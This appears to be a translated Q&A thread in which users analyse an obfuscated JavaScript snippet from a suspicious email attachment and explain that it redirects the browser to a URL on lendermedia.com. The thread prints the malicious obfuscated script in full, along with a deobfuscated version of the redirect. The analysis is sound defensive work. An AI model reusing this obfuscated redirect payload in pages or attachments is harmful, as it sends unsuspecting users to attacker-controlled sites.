6

我的一些非 IT 同事在一封看起来非常可疑的电子邮件中打开了一个 .html 附件。当似乎运行了一些 javascript 代码时,它会导致一个空白屏幕。

<script type='text/javascript'>function uK(){};var kV='';uK.prototype = {f : function() {d=4906;var w=function(){};var u=new Date();var hK=function(){};var h='hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'.replace(/[\^H\!9X]/g, '');var n=new Array();var e=function(){};var eJ='';t=document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')];this.nH=false;eX=2280;dF="dF";var hN=function(){return 'hN'};this.g=6633;var a='';dK="";function x(b){var aF=new Array();this.q='';var hKB=false;var uN="";b['hIrBeTf.'.replace(/[\.BTAI]/g, '')]=h;this.qO=15083;uR='';var hB=new Date();s="s";}var dI=46541;gN=55114;this.c="c";nT="";this.bG=false;var m=new Date();var fJ=49510;x(t);this.y="";bL='';var k=new Date();var mE=function(){};}};var l=22739;var tL=new uK(); var p="";tL.f();this.kY=false;</script>

它做了什么?这超出了我的编程知识范围。

4

4 回答 4

19

它将重定向到一个 url,“ http://lendermedia.com/images/z.htm ”(请自行承担风险)。

将代码复制并粘贴到有价值的 JavaScript 编辑器中,并让它为您格式化源代码。

关键点:

var h = 'hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'.replace(/[\^H\!9X]/g, '');

h将等于' http://lendermedia.com/images/z.htm '

t = document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')];

t将包含对document.location

b['hIrBeTf.'.replace(/[\.BTAI]/g, '')] = h;

名为hrefof的属性b,此时(在另一个函数中)确实t来自上述语句,设置为h,即 url。

大多数代码只是噪音,实际功能包括:

function uK() {
};
uK.prototype = {
  f : function() {
    var h = 'hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'
        .replace(/[\^H\!9X]/g, '');
    t = document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')];
    function x(b) {
      b['hIrBeTf.'.replace(/[\.BTAI]/g, '')] = h;
    }
    x(t);
  }
};
var tL = new uK();
tL.f();
于 2010-06-10T07:12:21.327 回答
2

我遇到了同样的问题,然后找到了这个页面。在为联系信息做了 WHOIS 后,我联系了 lendermedia.com 的所有者,他似乎刚刚发现他的网站在z.htm他不知情且违背他的意愿的情况下托管该页面。在我联系他时,我能够浏览他的/images/目录。此后,他更改了权限。这一切都表明这家伙看起来很干净,但这是由你决定的。

于 2010-06-10T19:21:22.683 回答
0

减去混淆,它会做类似的事情document.location.href="http://lendermedia.com/images/z.htm"

于 2010-06-10T07:38:05.830 回答
0

理解代码的关键部分是replace(/[\^H\!9X]/g, '')部件。如果替换的第二个参数是'',那么它只是从前一个字符串中删除内容。

混淆事物的方式真的很不雅。可能目标只是对每个用户随机并避免贝叶斯垃圾邮件过滤器。

于 2010-06-10T15:06:51.430 回答